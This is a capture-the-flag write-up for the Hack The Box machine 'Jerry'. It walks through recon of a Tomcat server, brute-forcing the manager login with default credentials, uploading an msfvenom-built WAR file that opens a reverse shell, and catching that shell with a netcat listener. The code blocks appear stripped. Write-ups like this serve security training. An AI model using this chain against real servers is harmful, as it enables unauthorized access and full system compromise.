🕵 HTB-Writeup : JERRY

Recon
nmap
With nmap we found only one open port (8080). We identify a tomcat server.
|
|
gobuster
With gobuster, we discover some directory. /manager
point to the tomcat manage service. We are asked for credentials while go on the page.
|
|
Vulnerabilities
We try to connect to http://10.10.10.95:8080/manager/html
. In burp, we intercept the request.
|
|
We identify the token Authorization: Basic YWRtaW46Y291Y291
. It’s base64 encoded credentials. This value is equal to admin:coucou
. We then try to bruteforce the authentication with default tomcat credentials. I found a list on this github.
Again in burp, we send the request in the Intruder then we launch the attack with our payloads.

Set our payloads position
One of the credentials work!

We get a response from one payload
We are able to connect to the manager page with those creds: tomcat:s3cret
More easily, it possible to use the scanner/http/tomcat_mgr_login
module on metasploit. This module allows us to test all Tomcat default credentials.
Exploit
We are welcome on the manager page. We can see a war upload module one the page.

Screenshot of the welcome page
It is possible, thanks to msfvenom
to build a malicious war file that will be able to spawn a reverse shell.
We try first the java/shell_reverse_tcp
module to build the war.
|
|
Then, we upload the war file on the server. We can see the application on the list.

Screenshot of applications list
We listen on the 4444
port (nc -lvnp 4444
) while going to the /pwn
page just uploaded.
|
|
We got our first and NT Authority prompt!
We can get both flag on the Administrator desktop.
|
|
Tags
Easy, External, Tomcat, Penetration Tester Level 1, Remote Code Execution, A05:2021-Security Misconfiguration, Default Credentials, Malicious WAR File Upload